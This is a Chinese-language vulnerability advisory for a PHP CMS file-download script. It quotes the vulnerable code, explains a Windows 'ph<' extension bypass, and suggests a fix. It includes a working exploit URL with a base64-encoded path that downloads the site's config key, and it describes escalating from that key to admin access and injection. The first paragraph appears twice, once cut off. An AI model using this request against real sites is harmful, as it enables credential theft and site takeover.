1.漏洞分析 /inc/job/download.php ``` $url=trim(base64_decode($url)); $fileurl=str_replace($webdb[www_url],"",$url); if( eregi(".php",$fileurl) && is_file(ROOT_PATH."$fileurl") ){ die("ERR"); } if(!$webdb[DownLoad_readfile]){ $fileurl=strstr($url,"://")?$url:tempdir($fileurl); header("location:$fileurl"); exit; } $webdb[upfileType] = str_replace(' ','|',$webdb[upfileType]); if( $webdb[local_download] && is_file(ROOT_PATH.$fileurl) && eregi("($webdb[upfileType])$",$fileurl) ){ $filename=basename($fileurl); $filetype=substr(strrchr($filename,'.'),1); $_filename=preg_replace("/([\d]+)_(200[\d]+)_([^_]+)\.([^\.]+)/is","\\3",$filename); if(eregi("^([a-z0-9=]+)$",$_filename)&&!eregi("(jpg|gif|png)$",$filename)){ $filename=urldecode(base64_decode($_filename)).".$filetype"; } ob_end_clean(); header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT'); header('Pragma: no-cache'); header('Content-Encoding: none'); header('Content-Disposition: attachment; filename='.$filename);...
1.漏洞分析 /inc/job/download.php ``` $url=trim(base64_decode($url)); $fileurl=str_replace($webdb[www_url],"",$url); if( eregi(".php",$fileurl) && is_file(ROOT_PATH."$fileurl") ){ die("ERR"); } if(!$webdb[DownLoad_readfile]){ $fileurl=strstr($url,"://")?$url:tempdir($fileurl); header("location:$fileurl"); exit; } $webdb[upfileType] = str_replace(' ','|',$webdb[upfileType]); if( $webdb[local_download] && is_file(ROOT_PATH.$fileurl) && eregi("($webdb[upfileType])$",$fileurl) ){ $filename=basename($fileurl); $filetype=substr(strrchr($filename,'.'),1); $_filename=preg_replace("/([\d]+)_(200[\d]+)_([^_]+)\.([^\.]+)/is","\\3",$filename); if(eregi("^([a-z0-9=]+)$",$_filename)&&!eregi("(jpg|gif|png)$",$filename)){ $filename=urldecode(base64_decode($_filename)).".$filetype"; } ob_end_clean(); header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT'); header('Pragma: no-cache'); header('Content-Encoding: none'); header('Content-Disposition: attachment; filename='.$filename); header('Content-type: '.$filetype); header('Content-Length: '.filesize(ROOT_PATH."$fileurl")); readfile(ROOT_PATH."$fileurl"); exit; } ``` url进过了base64解码 ``` if( eregi(".php",$fileurl) && is_file(ROOT_PATH."$fileurl") ){ die("ERR"); } ``` 匹配后缀 如果是php结尾的就退出 在windows下能用xxx.ph< 绕过 然后经过一系列的正则后会下载文件。 2.漏洞利用 /do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8 会下载:data/config.ph< 文件 下载的文件包含了key,有了key 就可以做很多事情,能提升为管理,能注入等。 用程序的mymd5函数加密解密数据,无视全局的gpc转义。 3.漏洞修复 /inc/job/download.php 40行 ``` $webdb[upfileType] = str_replace(' ','|',$webdb[upfileType]); if( $webdb[local_download] && is_file(ROOT_PATH.$fileurl) && eregi("($webdb[upfileType])$",$fileurl) ){ $filename=basename($fileurl); $filetype=substr(strrchr($filename,'.'),1); $_filename=preg_replace("/([\d]+)_(200[\d]+)_([^_]+)\.([^\.]+)/is","\\3",$filename); ``` $webdb[upfileType] 的值为合法的后缀 .rar|.txt|.jpg|.gif|.bmp|.png|.zip|.mp3|.wma|.wmv|.mpeg|.mpg|.rm|.ram|.htm|.doc|.swf|.avi|.flv|.sql|.doc|.ppt|.xls|.chm|.pdf